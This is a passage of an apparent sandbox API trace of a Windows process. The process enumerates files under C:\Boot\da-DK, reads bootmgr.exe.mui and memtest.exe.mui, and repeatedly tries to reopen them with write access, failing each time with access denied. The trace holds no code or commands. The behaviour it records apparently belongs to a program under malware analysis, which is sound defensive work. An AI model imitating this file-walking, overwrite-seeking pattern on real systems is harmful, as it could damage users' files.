returned 0x5 [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.334] AreFileApisANSI () returned 1 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.334] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88400 [0069.334] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88400, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\da-DK") returned 14 [0069.334] CreateFileW (lpFileName="C:\\Boot\\da-DK" (normalized: "c:\\boot\\da-dk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.334] GetLastError () returned 0x5 [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] GetLastError () returned 0x5 [0069.334] SetLastError (dwErrCode=0x5) [0069.334] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.335] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.335] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.335] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0009692, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef538bee, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.335] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.335] FindFirstFileExW (in: lpFileName="C:\\Boot\\da-DK\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78710 [0069.337] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa0008dbb, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5252b3, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.337] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47e189c, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47e189c, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209bac02, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.337] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.337] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0069.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.338] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.338] AreFileApisANSI () returned 1 [0069.338] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0069.338] AreFileApisANSI () returned 1 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.338] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.338] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0069.338] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.339] GetFileType (hFile=0x41c) returned 0x1 [0069.339] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.339] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.339] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.339] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.339] CloseHandle (hObject=0x41c) returned 1 [0069.339] AreFileApisANSI () returned 1 [0069.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.339] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0069.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88450, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 30 [0069.339] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.340] GetLastError () returned 0x5 [0069.340] GetLastError () returned 0x5 [0069.340] SetLastError (dwErrCode=0x5) [0069.340] GetLastError () returned 0x5 [0069.340] SetLastError (dwErrCode=0x5) [0069.340] GetLastError () returned 0x5 [0069.340] SetLastError (dwErrCode=0x5) [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.340] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.340] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48079da, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5252b3, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2ef7268, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.340] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.340] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0069.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.341] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.341] AreFileApisANSI () returned 1 [0069.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\da-DK\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0069.341] AreFileApisANSI () returned 1 [0069.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.341] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.341] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui") returned 30 [0069.341] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.342] GetFileType (hFile=0x41c) returned 0x1 [0069.342] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.342] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.342] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.342] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.342] CloseHandle (hObject=0x41c) returned 1 [0069.342] AreFileApisANSI () returned 1 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.342] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.342] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\da-DK\\memtest.exe.mui") returned 30 [0069.342] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.343] GetLastError () returned 0x5 [0069.343] GetLastError () returned 0x5 [0069.343] SetLastError (dwErrCode=0x5) [0069.343] GetLastError () returned 0x5 [0069.343] SetLastError (dwErrCode=0x5) [0069.343] GetLastError () returned 0x5 [0069.343] SetLastError (dwErrCode=0x5) [0069.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0069.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.343] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x69178, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓놠")) returned 0 [0069.344] FindClose (in: hFindFile=0x78710 | out: hFindFile=0x78710) returned 1 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.344] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.344] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.344] AreFileApisANSI () returned 1 [0069.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\de-DE", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\de-DE", lpUsedDefaultChar=0x0) returned 14 [0069.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.345] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.345] RtlAllocateHeap 